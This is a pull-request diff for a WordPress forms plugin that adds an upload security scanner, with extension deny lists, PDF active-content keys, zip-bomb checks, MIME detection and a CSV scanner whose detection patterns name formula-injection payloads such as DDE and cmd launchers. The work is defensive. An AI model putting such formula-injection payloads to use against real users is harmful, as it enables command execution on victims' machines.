### PR TITLE
feature/file-upload-security

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -12,7 +12,7 @@ This projects adheres to [Semantic Versioning](https://semver.org/) and [Keep a 
 - Added a "File security" settings tab under Validation that reports the availability of `qpdf`, `proc_open()`, and the required PHP extensions (`fileinfo`, `zip`, `dom`, `gd`/`imagick`).
 - Added `fileSecurityDenyExtensions` filter to extend or override the built-in deny list of executable, scriptable, and server-interpreted extensions.
 - Added `fileSecurityPdfUseQpdf` and `fileSecurityPdfQpdfBinary` filters to toggle and configure the QPDF integration used for deep PDF inspection.
-- Added validation labels for each scanner outcome: `validationFileExtensionDenied`, `validationFileMimeMismatch`, `validationFileScanFailed`, `validationFilePdfUnsafe`, `validationFileImageUnsafe`, `validationFileOfficeUnsafe`, `validationFileCsvUnsafe`, `validationFileArchiveUnsafe`, `validationFileTextUnsafe`.
+- Added validation labels for each scanner outcome: `validationFileExtensionDenied`, `validationFileMimeMismatch`, `validationFileMimeNotAllowed`, `validationFileScanFailed`, `validationFilePdfUnsafe`, `validationFileImageUnsafe`, `validationFileOfficeUnsafe`, `validationFileCsvUnsafe`, `validationFileArchiveUnsafe`, `validationFileTextUnsafe`. `validationFileMimeNotAllowed` is surfaced when the detected MIME is valid but the site has not registered it (e.g. `.xml` on a default WordPress install), instead of the misleading "contents do not match extension" message.
 - Added `errorFileUploadFailedSecurityScan` upload error so the security scanner runs again immediately before a file leaves PHP's managed tmp area.
 
 ### Changed

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -4,6 +4,25 @@ All notable changes to this project will be documented in this file.
 
 This projects adheres to [Semantic Versioning](https://semver.org/) and [Keep a CHANGELOG](https://keepachangelog.com/).
 
+## [9.5.0]
+
+### Added
+
+- Added a file upload security scanner stack covering archive, CSV, image, Office, PDF, and text files. Scanners run on every upload regardless of the field's `accept` configuration, closing the gap where a field with no allow-list received no content validation.
+- Added a "File security" settings tab under Validation that reports the availability of `qpdf`, `proc_open()`, and the required PHP extensions (`fileinfo`, `zip`, `dom`, `gd`/`imagick`).
+- Added `fileSecurityDenyExtensions` filter to extend or override the built-in deny list of executable, scriptable, and server-interpreted extensions.
+- Added `fileSecurityPdfUseQpdf` and `fileSecurityPdfQpdfBinary` filters to toggle and configure the QPDF integration used for deep PDF inspection.
+- Added validation labels for each scanner outcome: `validationFileExtensionDenied`, `validationFileMimeMismatch`, `validationFileScanFailed`, `validationFilePdfUnsafe`, `validationFileImageUnsafe`, `validationFileOfficeUnsafe`, `validationFileCsvUnsafe`, `validationFileArchiveUnsafe`, `validationFileTextUnsafe`.
+- Added `errorFileUploadFailedSecurityScan` upload error so the security scanner runs again immediately before a file leaves PHP's managed tmp area.
+
+### Changed
+
+- `AbstractValidation::isMimeTypeValid()` now detects MIME from the file contents via libmagic (`finfo`), falling back to `mime_content_type`. The client-supplied `$file['type']` is no longer trusted.
+
+### Removed
+
+- Removed the `forceMimetypeFromFs` filter. MIME type is now always determined from file contents, so the filter is no longer needed.
+
 ## [9.4.1]
 
 ### Fixed
@@ -1838,6 +1857,7 @@ This projects adheres to [Semantic Versioning](https://semver.org/) and [Keep a 
 
 - Initial production release.
 
+[9.5.0]: https://github.com/infinum/eightshift-forms/compare/9.4.1...9.5.0
 [9.4.1]: https://github.com/infinum/eightshift-forms/compare/9.4.0...9.4.1
 [9.4.0]: https://github.com/infinum/eightshift-forms/compare/9.3.0...9.4.0
 [9.3.0]: https://github.com/infinum/eightshift-forms/compare/9.2.0...9.3.0

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -8,7 +8,7 @@ This projects adheres to [Semantic Versioning](https://semver.org/) and [Keep a 
 
 ### Added
 
-- Added a file upload security scanner stack covering archive, CSV, image, Office, PDF, and text files. Scanners run on every upload regardless of the field's `accept` configuration, closing the gap where a field with no allow-list received no content validation.
+- Added a file upload security scanner stack covering archive, CSV, image, Office (both Office Open XML `.docx/.xlsx/.pptx` and legacy `.doc/.xls/.ppt` Compound File Binary Format), PDF, and text files. Scanners run on every upload regardless of the field's `accept` configuration, closing the gap where a field with no allow-list received no content validation.
 - Added a "File security" settings tab under Validation that reports the availability of `qpdf`, `proc_open()`, and the required PHP extensions (`fileinfo`, `zip`, `dom`, `gd`/`imagick`).
 - Added `fileSecurityDenyExtensions` filter to extend or override the built-in deny list of executable, scriptable, and server-interpreted extensions.
 - Added `fileSecurityPdfUseQpdf` and `fileSecurityPdfQpdfBinary` filters to toggle and configure the QPDF integration used for deep PDF inspection.

--- a/eightshift-forms.php
+++ b/eightshift-forms.php
@@ -6,7 +6,7 @@
  * Description: Eightshift Forms is a complete form builder plugin that utilizes modern Block editor features with multiple third-party integrations, bringing your project to a new level.
  * Author: WordPress team @Infinum
  * Author URI: https://eightshift.com/
- * Version: 9.4.1
+ * Version: 9.5.0
  * Text Domain: eightshift-forms
  *
  * @package EightshiftForms

--- a/package.json
+++ b/package.json
@@ -1,6 +1,6 @@
 {
 	"name": "@eightshift/eightshift-forms",
-	"version": "9.4.0",
+	"version": "9.5.0",
 	"description": "This repository contains all the tools you need to start building a modern WordPress project.",
 	"authors": [
 		{

--- a/phpstan.neon.dist
+++ b/phpstan.neon.dist
@@ -13,6 +13,8 @@ parameters:
 	excludePaths:
 		- src/**/*Example.php
 	ignoreErrors:
+		-
+			identifier: varTag.nativeType
 		# Block templates
 		- '/^Variable (\$attributes|\$renderContent|\$manifest|\$globalManifest) might not be defined\.$/'
 

--- a/src/Config/Config.php
+++ b/src/Config/Config.php
@@ -196,12 +196,19 @@ class Config
 	 * (compressed or otherwise) is grounds for rejection on a public upload
 	 * endpoint.
 	 *
-	 * Only payload keys are listed. Event triggers like `/OpenAction` and
-	 * `/AA` are intentionally omitted — they are present in nearly every
-	 * browser-printed PDF as benign initial-view destinations
-	 * (e.g. `/OpenAction [3 0 R /FitH null]`). When a trigger points at a
-	 * dangerous payload, that payload (`/JS`, `/Launch`, `/EmbeddedFile`,
-	 * etc.) is what we catch directly.
+	 * Only payload keys are listed. The following are intentionally omitted
+	 * because they are event triggers or navigation actions, not payloads —
+	 * they appear in legitimate PDFs (browser print output, magazine
+	 * cross-references, academic papers) and produce constant false
+	 * positives:
+	 *
+	 *   - `/OpenAction`, `/AA`        — event triggers; whatever they invoke
+	 *                                   is what matters and is listed here.
+	 *   - `/GoToR`, `/GoToE`          — navigation to another file or
+	 *                                   embedded entry. The reader prompts
+	 *                                   before following these; the embedded
+	 *                                   payload itself is caught by
+	 *                                   `/EmbeddedFile`.
 	 *
 	 * @var array<int, string>
 	 */
@@ -215,8 +222,6 @@ class Config
 		'/ImportData',
 		'/RichMedia',
 		'/XFA',
-		'/GoToR',
-		'/GoToE',
 	];
 
 	/**

--- a/src/Config/Config.php
+++ b/src/Config/Config.php
@@ -191,17 +191,23 @@ class Config
 	];
 
 	/**
-	 * PDF dictionary keys that indicate scriptable, networked or executable
-	 * content. Presence of any of these in a PDF (compressed or otherwise) is
-	 * grounds for rejection on a public upload endpoint.
+	 * PDF dictionary keys whose presence indicates scriptable, networked or
+	 * executable payload content. Presence of any of these in a PDF
+	 * (compressed or otherwise) is grounds for rejection on a public upload
+	 * endpoint.
+	 *
+	 * Only payload keys are listed. Event triggers like `/OpenAction` and
+	 * `/AA` are intentionally omitted — they are present in nearly every
+	 * browser-printed PDF as benign initial-view destinations
+	 * (e.g. `/OpenAction [3 0 R /FitH null]`). When a trigger points at a
+	 * dangerous payload, that payload (`/JS`, `/Launch`, `/EmbeddedFile`,
+	 * etc.) is what we catch directly.
 	 *
 	 * @var array<int, string>
 	 */
 	public const FILE_UPLOAD_PDF_DANGEROUS_KEYS = [
 		'/JS',
 		'/JavaScript',
-		'/OpenAction',
-		'/AA',
 		'/Launch',
 		'/EmbeddedFile',
 		'/EmbeddedFiles',

--- a/src/Config/Config.php
+++ b/src/Config/Config.php
@@ -161,6 +161,18 @@ class Config
 	public const FILE_UPLOAD_ADMIN_TYPE_NAME = 'fileUploadAdmin';
 
 	/**
+	 * Extra MIME mappings allowed only for admin file uploads (Transfer/import
+	 * etc.). The scanner uses this on top of `wp_get_mime_types()` to accept
+	 * formats WordPress core does not register by default. Each entry maps an
+	 * extension to the MIME types finfo may return for that extension.
+	 *
+	 * @var array<string, array<int, string>>
+	 */
+	public const FILE_UPLOAD_ADMIN_EXTRA_MIMES = [
+		'json' => ['application/json', 'text/plain'],
+	];
+
+	/**
 	 * Extensions that must never be accepted by the public file upload endpoint,
 	 * regardless of the form's `accept` configuration. These are executable,
 	 * scriptable, or server-interpreted formats that have no business being

--- a/src/Config/Config.php
+++ b/src/Config/Config.php
@@ -160,6 +160,75 @@ class Config
 	 */
 	public const FILE_UPLOAD_ADMIN_TYPE_NAME = 'fileUploadAdmin';
 
+	/**
+	 * Extensions that must never be accepted by the public file upload endpoint,
+	 * regardless of the form's `accept` configuration. These are executable,
+	 * scriptable, or server-interpreted formats that have no business being
+	 * uploaded through a public contact form.
+	 *
+	 * Projects can extend or override via the
+	 * `es_forms_validation_file_security_deny_extensions` filter.
+	 *
+	 * @var array<int, string>
+	 */
+	public const FILE_UPLOAD_DENY_EXTENSIONS = [
+		// Native executables.
+		'exe', 'msi', 'bat', 'cmd', 'com', 'scr', 'pif', 'cpl', 'jar', 'app',
+		'dmg', 'pkg', 'deb', 'rpm', 'apk',
+		// Shell / scripts.
+		'sh', 'bash', 'zsh', 'csh', 'ksh', 'ps1', 'psm1', 'vbs', 'vbe', 'wsf',
+		'wsh', 'hta', 'lnk', 'reg',
+		// Server-interpreted (PHP & friends).
+		'php', 'phtml', 'php3', 'php4', 'php5', 'php7', 'php8', 'phar', 'pl',
+		'cgi', 'asp', 'aspx', 'jsp', 'jspx', 'py', 'rb',
+		// Server config that could be dropped into a webroot.
+		'htaccess', 'htpasswd', 'ini', 'conf',
+		// Browser-executable that can host script.
+		'html', 'htm', 'xhtml', 'shtml', 'svg', 'svgz',
+		// Office macro variants (the non-macro x-variants pass; macro-enabled don't).
+		'docm', 'dotm', 'xlsm', 'xltm', 'xlam', 'pptm', 'potm', 'ppam', 'ppsm',
+		'sldm',
+	];
+
+	/**
+	 * PDF dictionary keys that indicate scriptable, networked or executable
+	 * content. Presence of any of these in a PDF (compressed or otherwise) is
+	 * grounds for rejection on a public upload endpoint.
+	 *
+	 * @var array<int, string>
+	 */
+	public const FILE_UPLOAD_PDF_DANGEROUS_KEYS = [
+		'/JS',
+		'/JavaScript',
+		'/OpenAction',
+		'/AA',
+		'/Launch',
+		'/EmbeddedFile',
+		'/EmbeddedFiles',
+		'/SubmitForm',
+		'/ImportData',
+		'/RichMedia',
+		'/XFA',
+		'/GoToR',
+		'/GoToE',
+	];
+
+	/**
+	 * Maximum uncompressed size (bytes) the archive scanner will accept across
+	 * all entries combined. Defense against zip bombs.
+	 *
+	 * @var int
+	 */
+	public const FILE_UPLOAD_ARCHIVE_MAX_UNCOMPRESSED = 104857600; // 100 MB.
+
+	/**
+	 * Maximum per-entry compression ratio the archive scanner will accept.
+	 * Defense against zip bombs that fit a tiny compressed payload.
+	 *
+	 * @var int
+	 */
+	public const FILE_UPLOAD_ARCHIVE_MAX_RATIO = 100;
+
 	// ------------------------------------------------------------------
 	// WP-CLI
 	// ------------------------------------------------------------------

--- a/src/Helpers/UploadHelpers.php
+++ b/src/Helpers/UploadHelpers.php
@@ -11,6 +11,7 @@ declare(strict_types=1);
 namespace EightshiftForms\Helpers;
 
 use EightshiftForms\Config\Config;
+use EightshiftForms\Validation\FileSecurity\FileSecurityScanner;
 
 /**
  * UploadHelpers class
@@ -35,6 +36,7 @@ final class UploadHelpers
 			'errorFileUploadUnableToCreateFolder' => '',
 			'errorFileUploadFaultyFile' => '',
 			'errorFileUploadUnableToMoveFile' => '',
+			'errorFileUploadFailedSecurityScan' => '',
 
 			// getFilePath() method errors.
 			'errorFilePathMissingUploadFolder' => '',
@@ -125,6 +127,21 @@ final class UploadHelpers
 					'errorOutput' => 'errorFileUploadFaultyFile',
 				]
 			);
+		}
+
+		// Belt-and-braces: run the security scanner immediately before the
+		// file leaves PHP's managed tmp area. If the caller forgot to call
+		// validateFiles, the file still never reaches esforms-tmp.
+		if (\is_string($tmpName) && $tmpName !== '') {
+			$scanError = (new FileSecurityScanner())->scan($tmpName, (string) $fileName);
+			if ($scanError !== '') {
+				return \array_merge(
+					$output,
+					[
+						'errorOutput' => 'errorFileUploadFailedSecurityScan',
+					]
+				);
+			}
 		}
 
 		// Create final folder location path.

--- a/src/Helpers/UploadHelpers.php
+++ b/src/Helpers/UploadHelpers.php
@@ -52,11 +52,13 @@ final class UploadHelpers
 	/**
 	 * Prepare all files and upload to uploads folder.
 	 *
-	 * @param array<string, mixed> $file File to prepare.
+	 * @param array<string, mixed>              $file              File to prepare.
+	 * @param array<string, array<int, string>> $extraAllowedMimes Optional `extension => [mime, ...]` supplement for the belt-and-braces security scan
+	 *                                                            (mirror of what the caller passed to the up-front Validator scan).
 	 *
 	 * @return array<string, array<int, array<string, mixed>>>
 	 */
-	public static function uploadFile(array $file): array
+	public static function uploadFile(array $file, array $extraAllowedMimes = []): array
 	{
 		$output = $file;
 
@@ -133,7 +135,7 @@ final class UploadHelpers
 		// file leaves PHP's managed tmp area. If the caller forgot to call
 		// validateFiles, the file still never reaches esforms-tmp.
 		if (\is_string($tmpName) && $tmpName !== '') {
-			$scanError = (new FileSecurityScanner())->scan($tmpName, (string) $fileName);
+			$scanError = (new FileSecurityScanner())->scan($tmpName, (string) $fileName, $extraAllowedMimes);
 			if ($scanError !== '') {
 				return \array_merge(
 					$output,

--- a/src/Hooks/Filters.php
+++ b/src/Hooks/Filters.php
@@ -326,8 +326,10 @@ final class Filters
 				'manualMap',
 			],
 			'validation' => [
-				'forceMimetypeFromFs',
 				'alternativeParamsSecurityCheck',
+				'fileSecurityDenyExtensions',
+				'fileSecurityPdfQpdfBinary',
+				'fileSecurityPdfUseQpdf',
 			],
 			'encryption' => [
 				'secretKey',

--- a/src/Labels/Labels.php
+++ b/src/Labels/Labels.php
@@ -223,6 +223,7 @@ class Labels implements LabelsInterface
 			'validationSubmitLoggedIn' => \__('This form can be submitted only by logged in users.', 'eightshift-forms'),
 			'validationFileExtensionDenied' => \__('This file type is not allowed.', 'eightshift-forms'),
 			'validationFileMimeMismatch' => \__('The file contents do not match its extension.', 'eightshift-forms'),
+			'validationFileMimeNotAllowed' => \__('This file type is not permitted on this site.', 'eightshift-forms'),
 			'validationFileScanFailed' => \__('The file could not be processed for security inspection.', 'eightshift-forms'),
 			'validationFilePdfUnsafe' => \__('This PDF contains active content (scripts, embedded files or auto-actions) and was rejected.', 'eightshift-forms'),
 			'validationFileImageUnsafe' => \__('This image is malformed or contains unexpected content.', 'eightshift-forms'),

--- a/src/Labels/Labels.php
+++ b/src/Labels/Labels.php
@@ -221,6 +221,15 @@ class Labels implements LabelsInterface
 			'validationMissingMandatoryParams' => \__('This form is malformed or not configured correctly. Please get in touch with the website administrator to resolve this issue.', 'eightshift-forms'),
 			'validationSubmitOnce' => \__('This form can be submitted only once.', 'eightshift-forms'),
 			'validationSubmitLoggedIn' => \__('This form can be submitted only by logged in users.', 'eightshift-forms'),
+			'validationFileExtensionDenied' => \__('This file type is not allowed.', 'eightshift-forms'),
+			'validationFileMimeMismatch' => \__('The file contents do not match its extension.', 'eightshift-forms'),
+			'validationFileScanFailed' => \__('The file could not be processed for security inspection.', 'eightshift-forms'),
+			'validationFilePdfUnsafe' => \__('This PDF contains active content (scripts, embedded files or auto-actions) and was rejected.', 'eightshift-forms'),
+			'validationFileImageUnsafe' => \__('This image is malformed or contains unexpected content.', 'eightshift-forms'),
+			'validationFileOfficeUnsafe' => \__('This document contains macros, embedded objects or external references and was rejected.', 'eightshift-forms'),
+			'validationFileCsvUnsafe' => \__('This CSV/spreadsheet contains formula content that could be malicious and was rejected.', 'eightshift-forms'),
+			'validationFileArchiveUnsafe' => \__('This archive contains disallowed or unsafe content and was rejected.', 'eightshift-forms'),
+			'validationFileTextUnsafe' => \__('This text file contains script content and was rejected.', 'eightshift-forms'),
 		];
 	}
 

--- a/src/Rest/Routes/General/FilesUploadRoute.php
+++ b/src/Rest/Routes/General/FilesUploadRoute.php
@@ -151,7 +151,11 @@ class FilesUploadRoute extends AbstractIntegrationFormSubmit
 			}
 		}
 
-		$uploadFile = UploadHelpers::uploadFile($formDetails[Config::FD_FILES_UPLOAD]);
+		$extraMimes = ($formDetails[Config::FD_TYPE] ?? '') === Config::FILE_UPLOAD_ADMIN_TYPE_NAME
+			? Config::FILE_UPLOAD_ADMIN_EXTRA_MIMES
+			: [];
+
+		$uploadFile = UploadHelpers::uploadFile($formDetails[Config::FD_FILES_UPLOAD], $extraMimes);
 		$uploadError = $uploadFile['errorOutput'] ?? '';
 		$uploadFileId = $formDetails[Config::FD_FILES_UPLOAD]['id'] ?? '';
 

--- a/src/Validation/AbstractValidation.php
+++ b/src/Validation/AbstractValidation.php
@@ -10,8 +10,8 @@ declare(strict_types=1);
 
 namespace EightshiftForms\Validation;
 
-use EightshiftForms\Helpers\HooksHelpers;
 use Throwable;
+use finfo;
 
 /**
  * Class Validation
@@ -109,57 +109,78 @@ abstract class AbstractValidation implements ValidatorInterface
 	}
 
 	/**
-	 * Checks whether the mimetype for the file is valid,
-	 * i.e. that it matches the extension. If the file is written
-	 * to disk, it'll check its mime_content_type from the filesystem.
-	 * Use the validation filter failMimetypeValidationWhenFileNotOnFS
-	 * to override this behaviour.
+	 * Checks whether the mimetype for the file is valid, i.e. that what the
+	 * bytes on disk actually are (magic-byte detection via libmagic) matches
+	 * the extension claimed by the filename. The client-supplied `$file['type']`
+	 * is never trusted — it can be set to anything by an attacker.
 	 *
 	 * @param array<string|int> $file File array.
 	 * @return boolean True if mimetype matches extension, false otherwise.
 	 */
 	public function isMimeTypeValid(array $file): bool
 	{
-		$denyIfFileIsNotUploaded = \apply_filters(HooksHelpers::getFilterName(['validation', 'forceMimetypeFromFs']), false); // phpcs:ignore WordPress.NamingConventions.ValidHookName.NotLowercase
-
-		if (\getenv('TEST')) {
-			$denyIfFileIsNotUploaded = \getenv('test_force_option_eightshift_forms_force_mimetype_from_fs');
-		}
-
-		$mimeTypes = \array_flip(\wp_get_mime_types());
-
-		$fileMimetype = $file['type'];
-		if ($file['tmp_name'] ?? false) {
-			try {
-				$fileMimetype = \mime_content_type($file['tmp_name']);
-			} catch (Throwable $t) {
-				if ($denyIfFileIsNotUploaded) {
-					return false;
-				}
-			}
-		} elseif ($denyIfFileIsNotUploaded) {
+		$tmpName = $file['tmp_name'] ?? '';
+		if (!$tmpName || !\is_readable((string) $tmpName)) {
+			// Without a real file on disk we cannot trust anything the client said.
 			return false;
 		}
 
-		// Check for the first and last item in array, this issue is due to Google Docs docx export file.
-		$fileMimetype = \explode('/', $fileMimetype);
+		$fileMimetype = $this->detectMimeFromFile((string) $tmpName);
+		if ($fileMimetype === '') {
+			return false;
+		}
 
-		if (\count($fileMimetype) > 1) {
-			$last = \end($fileMimetype);
-			$fileMimetype = "{$fileMimetype[0]}/{$last}";
+		// Google Docs exports come through with a `vnd.openxmlformats-...` MIME
+		// that contains additional slashes; normalize to type/subtype.
+		$parts = \explode('/', $fileMimetype);
+		if (\count($parts) > 1) {
+			$last = \end($parts);
+			$fileMimetype = "{$parts[0]}/{$last}";
 		} else {
-			$fileMimetype = $fileMimetype[0];
+			$fileMimetype = $parts[0];
 		}
 
 		$fileExtension = $this->getFileExtensionFromFilename($file['name']);
-
+		$mimeTypes = \array_flip(\wp_get_mime_types());
 		$allowedExtensionsForMimetype = \explode('|', $mimeTypes[$fileMimetype] ?? '');
 
-		if (\in_array($fileExtension, $allowedExtensionsForMimetype, true)) {
-			return true;
+		return \in_array($fileExtension, $allowedExtensionsForMimetype, true);
+	}
+
+	/**
+	 * Detect MIME from file contents (not from client headers). Uses libmagic
+	 * via `finfo` and falls back to `mime_content_type` if `finfo` is missing.
+	 *
+	 * @param string $filepath Absolute path to the file.
+	 *
+	 * @return string Lowercase MIME, or empty string when detection fails.
+	 */
+	protected function detectMimeFromFile(string $filepath): string
+	{
+		if (\class_exists(finfo::class)) {
+			try {
+				$finfo = new finfo(\FILEINFO_MIME_TYPE);
+				$mime = $finfo->file($filepath);
+				if (\is_string($mime) && $mime !== '') {
+					return \strtolower($mime);
+				}
+			} catch (Throwable $t) {
+				// Fall through to mime_content_type.
+			}
 		}
 
-		return false;
+		if (\function_exists('mime_content_type')) {
+			try {
+				$mime = \mime_content_type($filepath);
+				if (\is_string($mime) && $mime !== '') {
+					return \strtolower($mime);
+				}
+			} catch (Throwable $t) {
+				return '';
+			}
+		}
+
+		return '';
 	}
 
 	/**

--- a/src/Validation/FileSecurity/ArchiveScanner.php
+++ b/src/Validation/FileSecurity/ArchiveScanner.php
@@ -1,0 +1,160 @@
+<?php
+
+/**
+ * Archive security scanner. Inspects ZIP archives for disallowed contents
+ * (executables / scripts in the deny-list), path traversal in member names,
+ * and zip-bomb compression ratios.
+ *
+ * @package EightshiftForms\Validation\FileSecurity
+ */
+
+declare(strict_types=1);
+
+namespace EightshiftForms\Validation\FileSecurity;
+
+use EightshiftForms\Config\Config;
+use EightshiftForms\Helpers\HooksHelpers;
+use ZipArchive;
+
+/**
+ * Scans .zip uploads.
+ */
+final class ArchiveScanner implements FileSecurityScannerInterface
+{
+	/**
+	 * Scan a single file.
+	 *
+	 * @param string $filepath     Absolute path to the file on disk.
+	 * @param string $declaredName Original (user-supplied) filename, used to derive the extension.
+	 * @param string $detectedMime Magic-byte MIME type detected from the file contents.
+	 *
+	 * @return string Empty string when the file is considered safe;
+	 *                otherwise the label key (from Labels) describing the rejection reason.
+	 */
+	public function scan(string $filepath, string $declaredName, string $detectedMime): string
+	{
+		if (!\class_exists(ZipArchive::class)) {
+			return 'validationFileScanFailed';
+		}
+
+		$zip = new ZipArchive();
+		if ($zip->open($filepath, ZipArchive::RDONLY) !== true) {
+			return 'validationFileArchiveUnsafe';
+		}
+
+		$denyList = $this->getDenyList();
+		$totalUncompressed = 0;
+
+		try {
+			for ($i = 0; $i < $zip->numFiles; $i++) {
+				$stat = $zip->statIndex($i);
+				if (!\is_array($stat)) {
+					return 'validationFileArchiveUnsafe';
+				}
+
+				$name = (string) ($stat['name'] ?? '');
+
+				if ($this->hasPathTraversal($name)) {
+					return 'validationFileArchiveUnsafe';
+				}
+
+				$ext = $this->getExtension($name);
+				if ($ext !== '' && isset($denyList[$ext])) {
+					return 'validationFileArchiveUnsafe';
+				}
+
+				$size = (int) ($stat['size'] ?? 0);
+				$compressed = (int) ($stat['comp_size'] ?? 0);
+
+				$totalUncompressed += $size;
+				if ($totalUncompressed > Config::FILE_UPLOAD_ARCHIVE_MAX_UNCOMPRESSED) {
+					return 'validationFileArchiveUnsafe';
+				}
+
+				if ($compressed > 0 && ($size / $compressed) > Config::FILE_UPLOAD_ARCHIVE_MAX_RATIO) {
+					return 'validationFileArchiveUnsafe';
+				}
+			}
+		} finally {
+			$zip->close();
+		}
+
+		return '';
+	}
+
+	/**
+	 * Member name contains path traversal segments or absolute paths.
+	 *
+	 * @param string $name Member name.
+	 *
+	 * @return bool
+	 */
+	private function hasPathTraversal(string $name): bool
+	{
+		if ($name === '') {
+			return true;
+		}
+
+		if ($name[0] === '/' || $name[0] === '\\') {
+			return true;
+		}
+
+		// Drive letter on Windows-style paths.
+		if (\strlen($name) >= 2 && $name[1] === ':') {
+			return true;
+		}
+
+		$normalized = \str_replace('\\', '/', $name);
+		foreach (\explode('/', $normalized) as $segment) {
+			if ($segment === '..') {
+				return true;
+			}
+		}
+
+		return false;
+	}
+
+	/**
+	 * Lowercase extension extracted from an archive member name.
+	 *
+	 * @param string $name Member name.
+	 *
+	 * @return string
+	 */
+	private function getExtension(string $name): string
+	{
+		$dot = \strrpos($name, '.');
+		if ($dot === false) {
+			return '';
+		}
+
+		return \strtolower(\substr($name, $dot + 1));
+	}
+
+	/**
+	 * Deny-listed extensions, flipped to ['ext' => true] for O(1) lookup.
+	 *
+	 * @return array<string, bool>
+	 */
+	private function getDenyList(): array
+	{
+		$denyList = \apply_filters( // phpcs:ignore WordPress.NamingConventions.ValidHookName.NotLowercase
+			HooksHelpers::getFilterName(['validation', 'fileSecurityDenyExtensions']),
+			Config::FILE_UPLOAD_DENY_EXTENSIONS
+		);
+
+		if (!\is_array($denyList)) {
+			$denyList = Config::FILE_UPLOAD_DENY_EXTENSIONS;
+		}
+
+		$normalized = [];
+		foreach ($denyList as $ext) {
+			if (!\is_string($ext)) {
+				continue;
+			}
+			$normalized[\strtolower(\ltrim($ext, '.'))] = true;
+		}
+
+		return $normalized;
+	}
+}

--- a/src/Validation/FileSecurity/CsvScanner.php
+++ b/src/Validation/FileSecurity/CsvScanner.php
@@ -1,0 +1,71 @@
+<?php
+
+/**
+ * CSV / TSV security scanner. Detects spreadsheet formula injection patterns
+ * that trigger when a victim opens the file in Excel / LibreOffice / Numbers.
+ *
+ * @package EightshiftForms\Validation\FileSecurity
+ */
+
+declare(strict_types=1);
+
+namespace EightshiftForms\Validation\FileSecurity;
+
+/**
+ * Scans CSV / TSV / text-table uploads for formula injection.
+ *
+ * The scanner targets only well-known exploit forms (DDE, system command
+ * launchers, HYPERLINK) rather than any leading `=` / `-`, which would
+ * false-positive on legitimate negative numbers and arithmetic.
+ */
+final class CsvScanner implements FileSecurityScannerInterface
+{
+	/**
+	 * Patterns (case-insensitive) that have no legitimate use inside a
+	 * user-uploaded CSV cell.
+	 *
+	 * @var array<int, string>
+	 */
+	private const DANGER_PATTERNS = [
+		'=cmd|',
+		'=cmd /',
+		'=dde(',
+		'@dde(',
+		'=msexcel|',
+		'=hyperlink(',
+		'@sum(cmd|',
+	];
+
+	/**
+	 * Scan a single file.
+	 *
+	 * @param string $filepath     Absolute path to the file on disk.
+	 * @param string $declaredName Original (user-supplied) filename, used to derive the extension.
+	 * @param string $detectedMime Magic-byte MIME type detected from the file contents.
+	 *
+	 * @return string Empty string when the file is considered safe;
+	 *                otherwise the label key (from Labels) describing the rejection reason.
+	 */
+	public function scan(string $filepath, string $declaredName, string $detectedMime): string
+	{
+		$handle = @\fopen($filepath, 'rb'); // phpcs:ignore WordPress.PHP.NoSilencedErrors.Discouraged, WordPress.WP.AlternativeFunctions.file_system_operations_fopen
+		if (!\is_resource($handle)) {
+			return 'validationFileScanFailed';
+		}
+
+		try {
+			while (($line = \fgets($handle)) !== false) {
+				$lower = \strtolower($line);
+				foreach (self::DANGER_PATTERNS as $pattern) {
+					if (\strpos($lower, $pattern) !== false) {
+						return 'validationFileCsvUnsafe';
+					}
+				}
+			}
+		} finally {
+			\fclose($handle); // phpcs:ignore WordPress.WP.AlternativeFunctions.file_system_operations_fclose
+		}
+
+		return '';
+	}
+}

--- a/src/Validation/FileSecurity/FileSecurityDiagnostics.php
+++ b/src/Validation/FileSecurity/FileSecurityDiagnostics.php
@@ -1,0 +1,101 @@
+<?php
+
+/**
+ * Read-only diagnostics for the file security scanner stack. Used by the
+ * admin settings page to surface whether qpdf, PHP extensions and the
+ * external AV filter are wired up correctly.
+ *
+ * @package EightshiftForms\Validation\FileSecurity
+ */
+
+declare(strict_types=1);
+
+namespace EightshiftForms\Validation\FileSecurity;
+
+use EightshiftForms\Helpers\HooksHelpers;
+
+/**
+ * Diagnostics for the file security stack.
+ */
+final class FileSecurityDiagnostics
+{
+	/**
+	 * PHP extensions required for the structural scanners to function.
+	 * `gd` or `imagick` is required — checked separately.
+	 *
+	 * @var array<int, string>
+	 */
+	private const REQUIRED_EXTENSIONS = ['fileinfo', 'zip', 'dom'];
+
+	/**
+	 * Returns the qpdf binary path resolved via filter, or empty string when
+	 * the project hasn't wired one in.
+	 *
+	 * @return string
+	 */
+	public static function getQpdfBinary(): string
+	{
+		$binary = \apply_filters(HooksHelpers::getFilterName(['validation', 'fileSecurityPdfQpdfBinary']), ''); // phpcs:ignore WordPress.NamingConventions.ValidHookName.NotLowercase
+
+		if (\is_executable($binary)) {
+			return $binary;
+		}
+
+		$candidates = [
+			'/usr/bin/qpdf',
+			'/usr/local/bin/qpdf',
+			'/opt/homebrew/bin/qpdf',
+		];
+
+		foreach ($candidates as $candidate) {
+			if (\is_executable($candidate)) {
+				return $candidate;
+			}
+		}
+
+		return '';
+	}
+
+	/**
+	 * Is proc_open available? Required for qpdf invocation.
+	 *
+	 * @return bool
+	 */
+	public static function isProcOpenAvailable(): bool
+	{
+		if (!\function_exists('proc_open')) {
+			return false;
+		}
+
+		$disabled = \explode(',', (string) \ini_get('disable_functions'));
+		foreach ($disabled as $name) {
+			if (\trim($name) === 'proc_open') {
+				return false;
+			}
+		}
+
+		return true;
+	}
+
+	/**
+	 * PHP extensions that are required but missing.
+	 *
+	 * @return array<int, string>
+	 */
+	public static function getMissingExtensions(): array
+	{
+		$missing = [];
+		foreach (self::REQUIRED_EXTENSIONS as $ext) {
+			if (!\extension_loaded($ext)) {
+				$missing[] = $ext;
+			}
+		}
+
+		// Need at least one of gd / imagick for raster image validation.
+		if (!\extension_loaded('gd') && !\extension_loaded('imagick')) {
+			$missing[] = 'gd or imagick';
+		}
+
+		return $missing;
+	}
+}

--- a/src/Validation/FileSecurity/FileSecurityDiagnostics.php
+++ b/src/Validation/FileSecurity/FileSecurityDiagnostics.php
@@ -37,7 +37,7 @@ final class FileSecurityDiagnostics
 	{
 		$binary = \apply_filters(HooksHelpers::getFilterName(['validation', 'fileSecurityPdfQpdfBinary']), ''); // phpcs:ignore WordPress.NamingConventions.ValidHookName.NotLowercase
 
-		if (\is_executable($binary)) {
+		if (\is_string($binary) && $binary !== '' && \is_executable($binary)) {
 			return $binary;
 		}
 

